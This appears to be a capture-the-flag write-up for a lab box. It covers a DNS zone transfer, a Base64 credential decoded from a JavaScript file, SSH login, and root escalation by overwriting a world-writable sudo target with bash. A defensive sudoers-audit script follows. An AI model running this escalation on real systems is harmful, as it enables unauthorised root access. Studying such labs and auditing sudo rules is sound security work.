```
; <<>> DiG 9.20.4-4-Debian <<>> axfr @192.168.108.133 swamp.nyx
; (1 server found)
;; global options: +cmd
swamp.nyx. 604800 IN SOA ns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800
swamp.nyx. 604800 IN NS ns1.swamp.nyx.
d0nkey.swamp.nyx. 604800 IN A 0.0.0.0
dr4gon.swamp.nyx. 604800 IN A 0.0.0.0
duloc.swamp.nyx. 604800 IN A 0.0.0.0
f1ona.swamp.nyx. 604800 IN A 0.0.0.0
farfaraway.swamp.nyx. 604800 IN A 0.0.0.0
ns1.swamp.nyx. 604800 IN A 0.0.0.0
shr3k.swamp.nyx. 604800 IN A 0.0.0.0
swamp.nyx. 604800 IN SOA ns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800
;; Query time: 0 msec
;; SERVER: 192.168.108.133#53(192.168.108.133) (TCP)
;; WHEN: Mon May 26 08:22:55 CST 2025
;; XFR size: 10 records (messages 1, bytes 309)
```
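None of them had anything; visiting farfaraway.swamp.nyx, however, returned a JS file.

Looking closely, it contains a Base64-encoded string: c2hyZWs6cHV0b3Blc2FvZWxhc25v

Decoding it yields a credential: shrek:putopesaoelasno

Logging in over SSH with this credential succeeds.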
```
shrek@swamp:~$ sudo -l
Matching Defaults entries for shrek on swamp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User shrek may run the following commands on swamp:
    (ALL) NOPASSWD: /home/shrek/header_checker
```
It returned (ALL) NOPASSWD: /home/shrek/header_checker
```
shrek@swamp:~$ ls -l /home/shrek/header_checker
-rwsrwxrwx 1 root root 17736 Jan 4 14:23 /home/shrek/header_checker
```
The SUID bit is set and the file is writable, so bash can be written into it.
```
shrek@swamp:~$ echo -e '#!/bin/bash\n/bin/bash' > /home/shrek/header_checker
shrek@swamp:~$ chmod +x /home/shrek/header_checker
chmod: changing permissions of '/home/shrek/header_checker': Operation not permitted
shrek@swamp:~$ sudo /home/shrek/header_checker
root@swamp:/home/shrek#
root@swamp:/home/shrek# cat user.txt
7d199d72f12135ef193ad19faf9468ef
root@swamp:/home/shrek# cd ~
root@swamp:~# ls
root.txt
root@swamp:~# cat root.txt
9c7bddee2e2fb8ad03854f106f23c6b5
```
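The root cause above is a sudo rule whose target is world-writable and sits in a user's home directory. The following is an added example, not part of the original write-up, showing one way to audit sudoers rules for that condition; the function names and the sudoers line are constructed for illustration, and GNU stat (Linux) is assumed.

```shell
#!/bin/sh
# Added example: audit sudoers command targets for paths a non-root user can replace.
# Assumes GNU stat (Linux). Function names are hypothetical, not from any tool.

# Print the command path of every rule in sudoers-format text on stdin.
sudo_commands() {
    grep -Ev '^[[:space:]]*(#|Defaults|$)' |
    sed -E 's/^[^=]*=//; s/\([^)]*\)//g; s/[A-Z_]+://g' |
    tr ',' '\n' | awk '$1 ~ /^\// { print $1 }'
}

# Print why PATH is unsafe as a sudo target (nothing if it looks safe).
# The file and its directory must be owned by TRUSTED_UID and not group/world-writable.
risky_reason() {
    rr_path=$1; rr_uid=$2
    [ -e "$rr_path" ] || { echo "target does not exist"; return 0; }
    for rr_p in "$rr_path" "$(dirname "$rr_path")"; do
        rr_mode=$(stat -c '%a' "$rr_p"); rr_owner=$(stat -c '%u' "$rr_p")
        if [ "$rr_owner" != "$rr_uid" ]; then
            echo "$rr_p is owned by uid $rr_owner, expected $rr_uid"; return 0
        fi
        if [ $(( 0$rr_mode & 022 )) -ne 0 ]; then
            echo "$rr_p is group/world-writable (mode $rr_mode)"; return 0
        fi
    done
}

# audit_sudoers FILE [TRUSTED_UID]: one RISK line per unsafe target (uid defaults to 0).
audit_sudoers() {
    sudo_commands < "$1" | while read -r as_cmd; do
        as_why=$(risky_reason "$as_cmd" "${2:-0}")
        [ -z "$as_why" ] || echo "RISK $as_cmd: $as_why"
    done
}

# Constructed fixture mirroring the rule and -rwsrwxrwx mode shown above.
demo() {
    d=$(mktemp -d) && chmod 700 "$d"
    : > "$d/ok" && chmod 755 "$d/ok"
    : > "$d/header_checker" && chmod 4777 "$d/header_checker"
    printf 'shrek ALL=(ALL) NOPASSWD: %s, %s\n' "$d/header_checker" "$d/ok" > "$d/sudoers"
    # The fixture is owned by whoever runs this, so trust that uid; real audits use 0.
    audit_sudoers "$d/sudoers" "$(id -u)"
    rm -rf "$d"
}
demo
```

On a real host, run `audit_sudoers /etc/sudoers` as root with the default trusted uid of 0; a target under a user's home directory is then reported because the directory is not root-owned.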